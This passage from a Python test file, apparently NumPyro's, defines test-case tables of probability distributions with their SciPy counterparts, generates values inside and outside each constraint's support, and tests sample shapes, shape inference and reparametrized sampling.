super().__init__(dist.Poisson(rate), gate_logits, validate_args=validate_args)
@vmap_over.register
def _vmap_over_zero_inflated_poisson_logits(
self: ZeroInflatedPoissonLogits, rate=None, gate_logits=None
):
dist_axes = vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(
self,
base_dist=vmap_over(self.base_dist, rate=rate),
gate_logits=gate_logits,
gate=gate_logits,
)
dist_axes.rate = rate
return dist_axes
class SparsePoisson(dist.Poisson):
def __init__(self, rate, *, validate_args=None):
super().__init__(rate, is_sparse=True, validate_args=validate_args)
class FoldedNormal(dist.FoldedDistribution):
arg_constraints = {"loc": constraints.real, "scale": constraints.positive}
def __init__(self, loc, scale, validate_args=None):
self.loc = loc
self.scale = scale
super().__init__(dist.Normal(loc, scale), validate_args=validate_args)
@vmap_over.register
def _vmap_over_folded_normal(self: "FoldedNormal", loc=None, scale=None):
d = vmap_over.dispatch(dist.FoldedDistribution)(
self, base_dist=vmap_over(self.base_dist, loc=loc, scale=scale)
)
d.loc = loc
d.scale = scale
return d
class _SparseCAR(dist.CAR):
reparametrized_params = ["loc", "correlation", "conditional_precision"]
def __init__(
self,
loc,
correlation,
conditional_precision,
adj_matrix,
*,
is_sparse=True,
validate_args=None,
):
super().__init__(
loc,
correlation,
conditional_precision,
adj_matrix,
is_sparse=True,
validate_args=validate_args,
)
_DIST_MAP = {
dist.AsymmetricLaplace: lambda loc, scale, asymmetry: osp.laplace_asymmetric(
asymmetry, loc=loc, scale=scale
),
dist.BernoulliProbs: lambda probs: osp.bernoulli(p=probs),
dist.BernoulliLogits: lambda logits: osp.bernoulli(p=_to_probs_bernoulli(logits)),
dist.Beta: lambda con1, con0: osp.beta(con1, con0),
dist.BetaProportion: lambda mu, kappa: osp.beta(mu * kappa, (1 - mu) * kappa),
dist.BinomialProbs: lambda probs, total_count: osp.binom(n=total_count, p=probs),
dist.BinomialLogits: lambda logits, total_count: osp.binom(
n=total_count, p=_to_probs_bernoulli(logits)
),
dist.Cauchy: lambda loc, scale: osp.cauchy(loc=loc, scale=scale),
dist.Chi2: lambda df: osp.chi2(df),
dist.Dirichlet: lambda conc: osp.dirichlet(conc),
dist.Exponential: lambda rate: osp.expon(scale=jnp.reciprocal(rate)),
dist.Gamma: lambda conc, rate: osp.gamma(conc, scale=1.0 / rate),
dist.GeometricProbs: lambda probs: osp.geom(p=probs, loc=-1),
dist.GeometricLogits: lambda logits: osp.geom(
p=_to_probs_bernoulli(logits), loc=-1
),
dist.Gumbel: lambda loc, scale: osp.gumbel_r(loc=loc, scale=scale),
dist.HalfCauchy: lambda scale: osp.halfcauchy(scale=scale),
dist.HalfNormal: lambda scale: osp.halfnorm(scale=scale),
dist.InverseGamma: lambda conc, rate: osp.invgamma(conc, scale=rate),
dist.Laplace: lambda loc, scale: osp.laplace(loc=loc, scale=scale),
dist.LogNormal: lambda loc, scale: osp.lognorm(s=scale, scale=jnp.exp(loc)),
dist.LogUniform: lambda a, b: osp.loguniform(a, b),
dist.MultinomialProbs: lambda probs, total_count: osp.multinomial(
n=total_count, p=probs
),
dist.MultinomialLogits: lambda logits, total_count: osp.multinomial(
n=total_count, p=_to_probs_multinom(logits)
),
dist.MultivariateNormal: _mvn_to_scipy,
dist.MultivariateStudentT: _multivariate_t_to_scipy,
dist.LowRankMultivariateNormal: _lowrank_mvn_to_scipy,
dist.Normal: lambda loc, scale: osp.norm(loc=loc, scale=scale),
dist.Pareto: lambda scale, alpha: osp.pareto(alpha, scale=scale),
dist.Poisson: lambda rate: osp.poisson(rate),
dist.StudentT: lambda df, loc, scale: osp.t(df=df, loc=loc, scale=scale),
dist.Uniform: lambda a, b: osp.uniform(a, b - a),
dist.Logistic: lambda loc, scale: osp.logistic(loc=loc, scale=scale),
dist.VonMises: lambda loc, conc: osp.vonmises(
loc=np.array(loc, dtype=np.float64), kappa=np.array(conc, dtype=np.float64)
),
dist.Weibull: lambda scale, conc: osp.weibull_min(
c=conc,
scale=scale,
),
_TruncatedNormal: _truncnorm_to_scipy,
}
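# Resolve the scipy counterpart of a numpyro distribution class (or factory
# function) by walking its MRO, so subclasses fall back to the nearest mapped
# ancestor; implicitly returns None when there is no scipy equivalent.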
def get_sp_dist(jax_dist):
classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]
for cls in classes:
if cls in _DIST_MAP:
return _DIST_MAP[cls]
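# Test-case tables: each T(...) entry pairs a distribution (class or factory)
# with example parameters; the matching scipy distribution is attached
# automatically by T.__new__ via get_sp_dist.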
CONTINUOUS = [
T(dist.AsymmetricLaplace, 1.0, 0.5, 1.0),
T(dist.AsymmetricLaplace, np.array([1.0, 2.0]), 2.0, 2.0),
T(dist.AsymmetricLaplace, np.array([[1.0], [2.0]]), 2.0, np.array([3.0, 5.0])),
T(dist.AsymmetricLaplaceQuantile, 0.0, 1.0, 0.5),
T(dist.AsymmetricLaplaceQuantile, np.array([1.0, 2.0]), 2.0, 0.7),
T(
dist.AsymmetricLaplaceQuantile,
np.array([[1.0], [2.0]]),
2.0,
np.array([0.2, 0.8]),
),
T(dist.Beta, 0.2, 1.1),
T(dist.Beta, 1.0, np.array([2.0, 2.0])),
T(dist.Beta, 1.0, np.array([[1.0, 1.0], [2.0, 2.0]])),
T(dist.BetaProportion, 0.2, 10.0),
T(dist.BetaProportion, 0.51, np.array([2.0, 1.0])),
T(dist.BetaProportion, 0.5, np.array([[4.0, 4.0], [2.0, 2.0]])),
T(dist.Chi2, 2.0),
T(dist.Chi2, np.array([0.3, 1.3])),
T(dist.Cauchy, 0.0, 1.0),
T(dist.Cauchy, 0.0, np.array([1.0, 2.0])),
T(dist.Cauchy, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),
T(dist.Dirichlet, np.array([1.7])),
T(dist.Dirichlet, np.array([0.2, 1.1])),
T(dist.Dirichlet, np.array([[0.2, 1.1], [2.0, 2.0]])),
T(
dist.EulerMaruyama,
np.array([0.0, 0.1, 0.2]),
sde_fn1,
dist.Normal(0.1, 1.0),
),
T(
dist.EulerMaruyama,
np.array([0.0, 0.1, 0.2]),
sde_fn2,
dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),
),
T(
dist.EulerMaruyama,
np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),
sde_fn2,
dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),
),
T(
dist.EulerMaruyama,
np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),
sde_fn2,
dist.Normal(jnp.array([[0.0, 1.0], [2.0, 3.0]]), 1e-2).to_event(1),
),
T(dist.Exponential, 2.0),
T(dist.Exponential, np.array([4.0, 2.0])),
T(dist.Gamma, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.Gamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),
T(dist.GaussianRandomWalk, 0.1, 10),
T(dist.GaussianRandomWalk, np.array([0.1, 0.3, 0.25]), 10),
T(
dist.GaussianCopulaBeta,
np.array([7.0, 2.0]),
np.array([4.0, 10.0]),
np.array([[1.0, 0.75], [0.75, 1.0]]),
),
T(dist.GaussianCopulaBeta, 2.0, 1.5, np.eye(3)),
T(dist.GaussianCopulaBeta, 2.0, 1.5, np.full((5, 3, 3), np.eye(3))),
T(dist.Gompertz, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.Gompertz, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),
T(dist.Gumbel, 0.0, 1.0),
T(dist.Gumbel, 0.5, 2.0),
T(dist.Gumbel, np.array([0.0, 0.5]), np.array([1.0, 2.0])),
T(FoldedNormal, 2.0, 4.0),
T(FoldedNormal, np.array([2.0, 50.0]), np.array([4.0, 100.0])),
T(dist.HalfCauchy, 1.0),
T(dist.HalfCauchy, np.array([1.0, 2.0])),
T(dist.HalfNormal, 1.0),
T(dist.HalfNormal, np.array([1.0, 2.0])),
T(_ImproperWrapper, constraints.positive, (), (3,)),
T(dist.InverseGamma, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.InverseGamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),
T(dist.Kumaraswamy, 10.0, np.array([2.0, 3.0])),
T(dist.Kumaraswamy, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.Kumaraswamy, 0.6, 0.5),
T(dist.Laplace, 0.0, 1.0),
T(dist.Laplace, 0.5, np.array([1.0, 2.5])),
T(dist.Laplace, np.array([1.0, -0.5]), np.array([2.3, 3.0])),
T(dist.LKJ, 2, 0.5, "onion"),
T(dist.LKJ, 5, np.array([0.5, 1.0, 2.0]), "cvine"),
T(dist.LKJCholesky, 2, 0.5, "onion"),
T(dist.LKJCholesky, 2, 0.5, "cvine"),
T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), "onion"),
pytest.param(
*T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), "cvine"),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
pytest.param(
*T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), "onion"),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), "cvine"),
T(dist.Logistic, 0.0, 1.0),
T(dist.Logistic, 1.0, np.array([1.0, 2.0])),
T(dist.Logistic, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),
T(dist.LogNormal, 1.0, 0.2),
T(dist.LogNormal, -1.0, np.array([0.5, 1.3])),
T(dist.LogNormal, np.array([0.5, -0.7]), np.array([[0.1, 0.4], [0.5, 0.1]])),
T(dist.LogUniform, 1.0, 2.0),
T(dist.LogUniform, 1.0, np.array([2.0, 3.0])),
T(dist.LogUniform, np.array([1.0, 2.0]), np.array([[3.0], [4.0]])),
T(
dist.MatrixNormal,
1.0 * np.arange(6).reshape(3, 2),
np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]),
np.array([[1.0, 0], [0.4, 1]]),
),
T(
dist.MatrixNormal,
1.0 * np.arange(12).reshape((2, 3, 2)),
np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]) * np.ones((2, 3, 3)),
np.array([[1.0, 0], [0.4, 0.5]]) * np.ones((2, 2, 2)),
),
T(
dist.MatrixNormal,
1.0 * np.arange(36).reshape((2, 3, 3, 2)),
np.identity(3),
np.identity(2),
),
T(dist.MultivariateNormal, 0.0, np.array([[1.0, 0.5], [0.5, 1.0]]), None, None),
T(
dist.MultivariateNormal,
np.array([1.0, 3.0]),
None,
np.array([[1.0, 0.5], [0.5, 1.0]]),
None,
),
T(
dist.MultivariateNormal,
np.array([1.0, 3.0]),
None,
np.array([[[1.0, 0.5], [0.5, 1.0]]]),
None,
),
T(
dist.MultivariateNormal,
np.array([2.0]),
None,
None,
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateNormal,
np.arange(6, dtype=np.float32).reshape((3, 2)),
None,
None,
np.array([[1.0, 0.0], [0.0, 1.0]]),
),
T(
dist.MultivariateNormal,
0.0,
None,
np.broadcast_to(np.identity(3), (2, 3, 3)),
None,
),
T(
dist.CAR,
1.2,
np.array([-0.2, 0.3]),
0.1,
np.array(
[
[0.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 1.0, 0.0],
]
),
),
T(
dist.CAR,
np.array([0.0, 1.0, 3.0, 4.0]),
0.1,
np.array([0.3, 0.7]),
np.array(
[
[0.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 1.0, 0.0],
]
),
),
T(
_SparseCAR,
np.array([[0.0, 1.0, 3.0, 4.0], [2.0, -1.0, -3.0, 2.0]]),
0.0,
0.1,
np.array(
[
[0.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 1.0, 0.0],
]
),
),
T(
dist.MultivariateStudentT,
15.0,
0.0,
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.array([1.0, 3.0]),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.array([1.0, 3.0]),
np.array([[[1.0, 0.0], [0.5, 1.0]]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.array([3.0]),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.arange(6, dtype=np.float32).reshape((3, 2)),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.ones(3),
np.broadcast_to(np.identity(3), (2, 3, 3)),
),
T(
dist.MultivariateStudentT,
np.array(7.0),
np.array([1.0, 3.0]),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
np.arange(20, 22, dtype=jnp.float32),
np.ones(3),
np.broadcast_to(jnp.identity(3), (2, 3, 3)),
),
T(
dist.MultivariateStudentT,
np.arange(20, 26, dtype=jnp.float32).reshape((3, 2)),
np.ones(2),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.LowRankMultivariateNormal,
np.zeros(2),
np.array([[1.0], [0.0]]),
np.array([1.0, 1.0]),
),
T(
dist.LowRankMultivariateNormal,
np.arange(6, dtype=jnp.float32).reshape((2, 3)),
np.arange(6, dtype=jnp.float32).reshape((3, 2)),
np.array([1.0, 2.0, 3.0]),
),
T(dist.Normal, 0.0, 1.0),
T(dist.Normal, 1.0, np.array([1.0, 2.0])),
T(dist.Normal, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),
T(dist.Pareto, 1.0, 2.0),
T(dist.Pareto, np.array([1.0, 0.5]), np.array([0.3, 2.0])),
T(dist.Pareto, np.array([[1.0], [3.0]]), np.array([1.0, 0.5])),
T(dist.RelaxedBernoulliLogits, 2.0, -10.0),
T(dist.RelaxedBernoulliLogits, np.array([1.0, 3.0]), np.array([3.0, 8.0])),
T(dist.SoftLaplace, 1.0, 1.0),
T(dist.SoftLaplace, np.array([-1.0, 50.0]), np.array([4.0, 100.0])),
T(dist.StudentT, 1.0, 1.0, 0.5),
T(dist.StudentT, 2.0, np.array([1.0, 2.0]), 2.0),
T(dist.StudentT, np.array([3.0, 5.0]), np.array([[1.0], [2.0]]), 2.0),
T(_TruncatedCauchy, 0.0, 1.0, -1.0, None),
T(_TruncatedCauchy, 0.0, np.array([1.0, 2.0]), 1.0, None),
T(
_TruncatedCauchy,
np.array([0.0, 1.0]),
np.array([[1.0], [2.0]]),
np.array([-2.0, 2.0]),
None,
),
T(_TruncatedCauchy, 0.0, 1.0, None, 1.0),
T(_TruncatedCauchy, 0.0, 1.0, -1.0, 1.0),
T(_TruncatedNormal, 0.0, 1.0, -1.0, None),
T(_TruncatedNormal, -1.0, np.array([1.0, 2.0]), 1.0, None),
T(
_TruncatedNormal,
np.array([0.0, 1.0]),
np.array([[1.0], [2.0]]),
np.array([-2.0, 2.0]),
None,
),
T(_TruncatedNormal, -1.0, 2.0, 1.0, 5.0),
T(_TruncatedNormal, np.array([-1.0, 4.0]), 2.0, None, 5.0),
T(_TruncatedNormal, -1.0, np.array([2.0, 3.0]), 1.0, None),
T(_TruncatedNormal, -1.0, 2.0, np.array([-6.0, 4.0]), np.array([-4.0, 6.0])),
T(
_TruncatedNormal,
np.array([0.0, 1.0]),
np.array([[1.0], [2.0]]),
None,
np.array([-2.0, 2.0]),
),
T(dist.TwoSidedTruncatedDistribution, dist.Laplace(0.0, 1.0), -2.0, 3.0),
T(dist.Uniform, 0.0, 2.0),
T(dist.Uniform, 1.0, np.array([2.0, 3.0])),
T(dist.Uniform, np.array([0.0, 0.0]), np.array([[2.0], [3.0]])),
T(dist.Weibull, 0.2, 1.1),
T(dist.Weibull, 2.8, np.array([2.0, 2.0])),
T(dist.Weibull, 1.8, np.array([[1.0, 1.0], [2.0, 2.0]])),
T(
_GaussianMixture,
np.ones(3) / 3.0,
np.array([0.0, 7.7, 2.1]),
np.array([4.2, 7.7, 2.1]),
),
T(
_Gaussian2DMixture,
np.array([0.2, 0.5, 0.3]),
np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean
np.array(
[
[
[0.1, -0.2],
[-0.2, 1.0],
],
[
[0.75, 0.0],
[0.0, 0.75],
],
[
[1.0, 0.5],
[0.5, 0.27],
],
]
), # Covariance
),
T(
_GeneralMixture,
np.array([0.2, 0.3, 0.5]),
np.array([0.0, 7.7, 2.1]),
np.array([4.2, 1.7, 2.1]),
),
T(
_General2DMixture,
np.array([0.2, 0.5, 0.3]),
np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean
np.array(
[
[
[0.1, -0.2],
[-0.2, 1.0],
],
[
[0.75, 0.0],
[0.0, 0.75],
],
[
[1.0, 0.5],
[0.5, 0.27],
],
]
), # Covariance
),
]
DIRECTIONAL = [
T(dist.VonMises, 2.0, 10.0),
T(dist.VonMises, 2.0, np.array([150.0, 10.0])),
T(dist.VonMises, np.array([1 / 3 * np.pi, -1.0]), np.array([20.0, 30.0])),
pytest.param(
*T(
dist.SineBivariateVonMises,
0.0,
0.0,
5.0,
6.0,
2.0,
),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
T(
dist.SineBivariateVonMises,
3.003,
-1.343,
5.0,
6.0,
2.0,
),
pytest.param(
*T(
dist.SineBivariateVonMises,
-1.232,
-1.3430,
3.4,
2.0,
1.0,
),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
pytest.param(
*T(
dist.SineBivariateVonMises,
np.array([math.pi - 0.2, 1.0]),
np.array([0.0, 1.0]),
np.array([5.0, 5.0]),
np.array([7.0, 0.5]),
None,
np.array([0.5, 0.1]),
),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
T(dist.ProjectedNormal, np.array([0.0, 0.0])),
T(dist.ProjectedNormal, np.array([[2.0, 3.0]])),
T(dist.ProjectedNormal, np.array([0.0, 0.0, 0.0])),
T(dist.ProjectedNormal, np.array([[-1.0, 2.0, 3.0]])),
T(SineSkewedUniform, np.array([-math.pi / 4, 0.1])),
T(SineSkewedVonMises, np.array([0.342355])),
T(SineSkewedVonMisesBatched, np.array([[0.342355, -0.0001], [0.91, 0.09]])),
]
DISCRETE = [
T(dist.BetaBinomial, 2.0, 5.0, 10),
T(
dist.BetaBinomial,
np.array([2.0, 4.0]),
np.array([5.0, 3.0]),
np.array([10, 12]),
),
T(dist.BernoulliProbs, 0.2),
T(dist.BernoulliProbs, np.array([0.2, 0.7])),
T(dist.BernoulliLogits, np.array([-1.0, 3.0])),
T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([10, 2])),
T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([5, 8])),
T(dist.BinomialLogits, np.array([-1.0, 3.0]), np.array([5, 8])),
T(dist.CategoricalProbs, np.array([1.0])),
T(dist.CategoricalProbs, np.array([0.1, 0.5, 0.4])),
T(dist.CategoricalProbs, np.array([[0.1, 0.5, 0.4], [0.4, 0.4, 0.2]])),
T(dist.CategoricalLogits, np.array([-5.0])),
T(dist.CategoricalLogits, np.array([1.0, 2.0, -2.0])),
T(dist.CategoricalLogits, np.array([[-1, 2.0, 3.0], [3.0, -4.0, -2.0]])),
T(dist.Delta, 1),
T(dist.Delta, np.array([0.0, 2.0])),
T(dist.Delta, np.array([0.0, 2.0]), np.array([-2.0, -4.0])),
T(dist.DirichletMultinomial, np.array([1.0, 2.0, 3.9]), 10),
T(dist.DirichletMultinomial, np.array([0.2, 0.7, 1.1]), np.array([5, 5])),
T(dist.GammaPoisson, 2.0, 2.0),
T(dist.GammaPoisson, np.array([6.0, 2]), np.array([2.0, 8.0])),
T(dist.GeometricProbs, 0.2),
T(dist.GeometricProbs, np.array([0.2, 0.7])),
T(dist.GeometricLogits, np.array([-1.0, 3.0])),
T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), 10),
T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), np.array([5, 8])),
T(dist.MultinomialLogits, np.array([-1.0, 3.0]), np.array([[5], [8]])),
T(dist.NegativeBinomialProbs, 10, 0.2),
T(dist.NegativeBinomialProbs, 10, np.array([0.2, 0.6])),
T(dist.NegativeBinomialProbs, np.array([4.2, 10.7, 2.1]), 0.2),
T(
dist.NegativeBinomialProbs,
np.array([4.2, 10.7, 2.1]),
np.array([0.2, 0.6, 0.5]),
),
T(dist.NegativeBinomialLogits, 10, -2.1),
T(dist.NegativeBinomialLogits, 10, np.array([-5.2, 2.1])),
T(dist.NegativeBinomialLogits, np.array([4.2, 10.7, 2.1]), -5.2),
T(
dist.NegativeBinomialLogits,
np.array([4.2, 7.7, 2.1]),
np.array([4.2, 0.7, 2.1]),
),
T(dist.NegativeBinomial2, 0.3, 10),
T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), 10),
T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), np.array([10.2, 20.7, 2.1])),
T(dist.OrderedLogistic, -2, np.array([-10.0, 4.0, 9.0])),
T(dist.OrderedLogistic, np.array([-4, 3, 4, 5]), np.array([-1.5])),
T(dist.DiscreteUniform, -2, np.array([-1.0, 4.0, 9.0])),
T(dist.DiscreteUniform, np.array([-4, 3, 4, 5]), np.array([6])),
T(dist.Poisson, 2.0),
T(dist.Poisson, np.array([2.0, 3.0, 5.0])),
T(SparsePoisson, 2.0),
T(SparsePoisson, np.array([2.0, 3.0, 5.0])),
T(SparsePoisson, 2),
T(dist.ZeroInflatedPoisson, 0.6, 2.0),
T(dist.ZeroInflatedPoisson, np.array([0.2, 0.7, 0.3]), np.array([2.0, 3.0, 5.0])),
T(ZeroInflatedPoissonLogits, 2.0, 3.0),
T(
ZeroInflatedPoissonLogits,
np.array([0.2, 4.0, 0.3]),
np.array([2.0, -3.0, 5.0]),
),
]
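# A distribution counts as "batched multivariate" when it has both a non-empty
# event shape and a non-empty batch shape; several scipy comparisons below
# skip that case because scipy cannot score batched multivariate samples.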
def _is_batched_multivariate(jax_dist):
return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0
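# Generate example values inside (gen_values_within_bounds) and outside
# (gen_values_outside_bounds) the support of each constraint type, keyed on
# the constraint class or singleton.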
def gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):
eps = 1e-6
if constraint is constraints.boolean:
return random.bernoulli(key, shape=size)
elif isinstance(constraint, constraints.greater_than):
return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps
elif isinstance(constraint, constraints.integer_interval):
lower_bound = jnp.broadcast_to(constraint.lower_bound, size)
upper_bound = jnp.broadcast_to(constraint.upper_bound, size)
return random.randint(key, size, lower_bound, upper_bound + 1)
elif isinstance(constraint, constraints.integer_greater_than):
return constraint.lower_bound + random.poisson(key, np.array(5), shape=size)
elif isinstance(constraint, constraints.interval):
lower_bound = jnp.broadcast_to(constraint.lower_bound, size)
upper_bound = jnp.broadcast_to(constraint.upper_bound, size)
return random.uniform(key, size, minval=lower_bound, maxval=upper_bound)
elif constraint in (constraints.real, constraints.real_vector):
return random.normal(key, size)
elif constraint is constraints.simplex:
return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])
elif isinstance(constraint, constraints.multinomial):
n = size[-1]
return multinomial(
key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]
)
elif constraint is constraints.corr_cholesky:
return signed_stick_breaking_tril(
random.uniform(
key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1
)
)
elif constraint is constraints.corr_matrix:
cholesky = signed_stick_breaking_tril(
random.uniform(
key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1
)
)
return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))
elif constraint is constraints.lower_cholesky:
return jnp.tril(random.uniform(key, size))
elif constraint is constraints.positive_definite:
x = random.normal(key, size)
return jnp.matmul(x, jnp.swapaxes(x, -2, -1))
elif constraint is constraints.ordered_vector:
x = jnp.cumsum(random.exponential(key, size), -1)
return x - random.normal(key, size[:-1] + (1,))
elif isinstance(constraint, constraints.independent):
return gen_values_within_bounds(constraint.base_constraint, size, key)
elif constraint is constraints.sphere:
x = random.normal(key, size)
return x / jnp.linalg.norm(x, axis=-1)
elif constraint is constraints.l1_ball:
key1, key2 = random.split(key)
sign = random.bernoulli(key1)
bounds = [0, (-1) ** sign * 0.5]
return random.uniform(key, size, float, *sorted(bounds))
else:
raise NotImplementedError("{} not implemented.".format(constraint))
def gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):
if constraint is constraints.boolean:
return random.bernoulli(key, shape=size) - 2
elif isinstance(constraint, constraints.greater_than):
return constraint.lower_bound - jnp.exp(random.normal(key, size))
elif isinstance(constraint, constraints.integer_interval):
lower_bound = jnp.broadcast_to(constraint.lower_bound, size)
return random.randint(key, size, lower_bound - 1, lower_bound)
elif isinstance(constraint, constraints.integer_greater_than):
return constraint.lower_bound - random.poisson(key, np.array(5), shape=size)
elif isinstance(constraint, constraints.interval):
upper_bound = jnp.broadcast_to(constraint.upper_bound, size)
return random.uniform(key, size, minval=upper_bound, maxval=upper_bound + 1.0)
elif constraint in [constraints.real, constraints.real_vector]:
return lax.full(size, np.nan)
elif constraint is constraints.simplex:
return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]) + 1e-2
elif isinstance(constraint, constraints.multinomial):
n = size[-1]
return (
multinomial(
key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]
)
+ 1
)
elif constraint is constraints.corr_cholesky:
return (
signed_stick_breaking_tril(
random.uniform(
key,
size[:-2] + (size[-1] * (size[-1] - 1) // 2,),
minval=-1,
maxval=1,
)
)
+ 1e-2
)
elif constraint is constraints.corr_matrix:
cholesky = 1e-2 + signed_stick_breaking_tril(
random.uniform(
key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1
)
)
return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))
elif constraint is constraints.lower_cholesky:
return random.uniform(key, size)
elif constraint is constraints.positive_definite:
return random.normal(key, size)
elif constraint is constraints.ordered_vector:
x = jnp.cumsum(random.exponential(key, size), -1)
return x[..., ::-1]
elif isinstance(constraint, constraints.independent):
return gen_values_outside_bounds(constraint.base_constraint, size, key)
elif constraint is constraints.sphere:
x = random.normal(key, size)
x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)
return 2 * x
elif constraint is constraints.l1_ball:
key1, key2 = random.split(key)
sign = random.bernoulli(key1)
bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]
return random.uniform(key, size, float, *sorted(bounds))
else:
raise NotImplementedError("{} not implemented.".format(constraint))
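# The parametrized tests below iterate over the CONTINUOUS, DISCRETE and
# DIRECTIONAL tables defined above.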
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
@pytest.mark.parametrize("prepend_shape", [(), (2,), (2, 3)])
def test_dist_shape(jax_dist, sp_dist, params, prepend_shape):
jax_dist = jax_dist(*params)
rng_key = random.PRNGKey(0)
expected_shape = prepend_shape + jax_dist.batch_shape + jax_dist.event_shape
samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)
assert isinstance(samples, jnp.ndarray)
assert jnp.shape(samples) == expected_shape
if (
sp_dist
and not _is_batched_multivariate(jax_dist)
and not isinstance(jax_dist, dist.MultivariateStudentT)
):
sp_dist = sp_dist(*params)
sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)
assert jnp.shape(sp_samples) == expected_shape
elif (
sp_dist
and not _is_batched_multivariate(jax_dist)
and isinstance(jax_dist, dist.MultivariateStudentT)
):
sp_dist = sp_dist(*params)
size_ = prepend_shape + jax_dist.batch_shape
size = (1) if size_ == () else size_
try:
sp_samples = sp_dist.rvs(size=size)
except ValueError:
pytest.skip("scipy multivariate t doesn't support size with > 1 element")
assert jnp.shape(sp_samples) == expected_shape
if isinstance(jax_dist, (dist.MultivariateNormal, dist.MultivariateStudentT)):
assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2
assert_allclose(
jax_dist.precision_matrix,
jnp.linalg.inv(jax_dist.covariance_matrix),
rtol=1e-6,
)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_infer_shapes(jax_dist, sp_dist, params):
shapes = tuple(getattr(p, "shape", ()) for p in params)
shapes = tuple(x() if callable(x) else x for x in shapes)
jax_dist = jax_dist(*params)
try:
expected_batch_shape, expected_event_shape = type(jax_dist).infer_shapes(
*shapes
)
except NotImplementedError:
pytest.skip(f"{type(jax_dist).__name__}.infer_shapes() is not implemented")
assert jax_dist.batch_shape == expected_batch_shape
assert jax_dist.event_shape == expected_event_shape
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_has_rsample(jax_dist, sp_dist, params):
jax_dist = jax_dist(*params)
masked_dist = jax_dist.mask(False)
indept_dist = jax_dist.expand_by([2]).to_event(1)
transf_dist = dist.TransformedDistribution(jax_dist, biject_to(constraints.real))
assert masked_dist.has_rsample == jax_dist.has_rsample
assert indept_dist.has_rsample == jax_dist.has_rsample
assert transf_dist.has_rsample == jax_dist.has_rsample
if jax_dist.has_rsample:
assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete
